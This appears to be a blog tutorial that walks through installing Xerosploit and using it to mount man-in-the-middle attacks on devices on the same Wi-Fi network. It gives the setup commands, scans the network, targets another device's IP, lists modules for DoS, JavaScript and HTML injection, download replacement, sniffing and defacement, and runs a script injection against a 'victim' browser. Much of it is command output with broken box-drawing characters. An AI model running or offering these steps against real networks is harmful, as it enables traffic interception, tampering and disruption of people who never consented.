Table of Contents
Xerosploit – A man-in-the-middle attack or MITM attackย is nothing but the take the control of surrounding Devices on the same wifi network. This attack can spy on networks and make modify certain things.
Xerosploit is one of the best tools for man-in-the-middleย attacksย but this tool can’t attack all websites because nowadays most websites are using HTTPS.
Someย sitesย can still be accessing the HTTP because they are not redirecting HTTPS
How to install and use Xerosploit?
Install Xerosploit
First of all, we need to download the Xeros-ploit tool so type the below command in your Linux terminal
git clone https://github.com/LionSec/xerosploit.git
Then, change into its directory to using the cd command
cd xerosploit
Now run the installer file using python2. then choose which operating system you used, in my case, I used Linux, so I choose, 1st option
sudo python2 install.py
Install the Dependencies
For This tool need some Dependencies to run without error so execute the following command in your Linux terminal.
sudo apt install nmap hping3 build-essential ruby-dev libpcap-dev libgmp3-dev
Now we need to install the “tabulate and terminal tables“, which will help you to display the Xerosploit information without error.
sudo pip3 install tabulate terminaltables
Xerosploit commands
Start the Xerosploit tool with the Xerosploit command
~/xerosploit$ sudo xerosploit
โ โโโโโ โโโโโ โโโโโ โโโโโ โ โโ โ โโโโโ โโ โโโโโ
โโ โ โโ โ โ โโ โ โ โ โโ โ โ โ โ โ โโ โโโ โ
โ โ โโโโ โโโโ โ โ โ โโโโโ โโโโ โ โ โ โโ โ
โ โ โโ โโ โ โ โโโโโ โโโโโโ โ โโโโ โโโโโ โโ โ
โ โโ โโโโโ โ โ โ โ โ
โ โ โ
[+]โโโโโโโโโโโ[ Author : @LionSec1 _-\|/-_ Website: www.neodrix.com ]โโโโโโโโโโโ[+]
[ Powered by Bettercap and Nmap ]
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ
โ Your Network Configuration โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโคโโโโโโโโโโโโโโโโโโโโคโโโโโโโโโโโโโโคโโโโโโโโโโคโโโโโโโโโโโโโโ
โ IP Address โ MAC Address โ Gateway โ Iface โ Hostname โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโชโโโโโโโโโโโโโโโโโโโโชโโโโโโโโโโโโโโชโโโโโโโโโโชโโโโโโโโโโโโโโก
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโผโโโโโโโโโโผโโโโโโโโโโโโโโค
โ 192.168.8.172 fd0b:ed07:cb03:10::3fa fd0b:ed07:cb03:10:dcf1:e71a:2dc3:299fโโ 28:D2:44:23:54:2B โ 192.168.8.1 โ eth0 โ Macbook-Pro โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโงโโโโโโโโโโโโโโโโโโโโงโโโโโโโโโโโโโโงโโโโโโโโโโงโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโฆโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ Xerosploit is a penetration testing toolkit whose goal is to โ
โ Information โ perform man in the middle attacks for testing purposes. โ
โ โ It brings various modules that allow to realise efficient attacks. โ
โ โ This tool is Powered by Bettercap and Nmap. โ
โโโโโโโโโโโโโโโฉโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Please type 'help' to view commands.
Xero โฎ
Now Type helpย to see all of the commands available in Xerosploit.
Xero โฎ help
โโโโโโโโโโโโฆโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ โ
โ โ scan : Map your network. โ
โ โ โ
โ โ iface : Manually set your network interface. โ
โ COMMANDS โ โ
โ โ gateway : Manually set your gateway. โ
โ โ โ
โ โ start : Skip scan and directly set your target IP address. โ
โ โ โ
โ โ rmlog : Delete all xerosploit logs. โ
โ โ โ
โ โ help : Display this help message. โ
โ โ โ
โ โ exit : Close Xerosploit. โ
โ โ โ
โโโโโโโโโโโโฉโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Please type 'help' to view commands.
Xero โฎ
Choose Target
Now type the “scan” command in your terminal. That will show all connected devices in yourย wifiย network
Xero โฎ scan
[++} Mapping your network ...
[+]โโโโโโโโโโโ[ Devices found on your network ]โโโโโโโโโโโ[+]
โโโโโโโโโโโโโโโโโฆโโโโโโโโโโโโโโโโโโโโฆโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ IP Address โ Mac Address โ Manufacturer โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ 192.168.8.1 โ 94:83:C4:00:EB:C5 โ (Unknown) โ
โ 192.168.8.215 โ B8:70:F4:AD:44:C8 โ (Compal Information(kunshan)) โ
โ 192.168.8.172 โ 28:D2:44:12:23:6B โ (This device) โ
โโโโโโโโโโโโโโโโโฉโโโโโโโโโโโโโโโโโโโโฉโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.
Xero โฎ
Now choose your target IP address. Then type that IP address in your terminal
Xero โฎ 192.168.8.215
[++] 192.168.8.215 ha been targeted.
[+] Which module do you want to load ? Enter 'help' for more information.
Xeroยปmodules โฎ
Now, it will ask you which module you want to run against the target. If you don’t know the module you want, typeย helpย to see a complete list.
Xeroยปmodules โฎ help
โโโโโโโโโโโฆโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ โ
โ โ pscan : Port Scanner โ
โ โ โ
โ โ dos : DoS Attack โ
โ โ โ
โ โ ping : Ping Request โ
โ โ โ
โ โ injecthtml : Inject Html code โ
โ โ โ
โ โ injectjs : Inject Javascript code โ
โ โ โ
โ โ rdownload : Replace files being downloaded โ
โ โ โ
โ โ sniff : Capturing information inside network packets โ
โ MODULES โ โ
โ โ dspoof : Redirect all the http traffic to the specified one IP โ
โ โ โ
โ โ yplay : Play background sound in target browser โ
โ โ โ
โ โ replace : Replace all web pages images with your own one โ
โ โ โ
โ โ driftnet : View all images requested by your targets โ
โ โ โ
โ โ move : Shaking Web Browser content โ
โ โ โ
โ โ deface : Overwrite all web pages with your HTML code โ
โ โ โ
โโโโโโโโโโโฉโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Which module do you want to load ? Enter 'help' for more information.
Xeroยปmodules โฎ
After choosing the module, just type the “run” command on your terminal. I will show one exampleย
Now I will choose the “move” module. This module shake your victim browser
Xeroยปmodules โฎ move
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ
โ Shakescreen โ
โ โ
โ Shaking Web Browser content โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Enter 'run' to execute the 'move' command.
Xeroยปmodulesยปshakescreen โฎ
Xeroยปmodulesยปshakescreen โฎ run
[++] Injecting shakescreen.js ...
[++] Press 'Ctrl + C' to stop.
Now your victim browser get shake every scroll and move continuously
Very very nice ๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐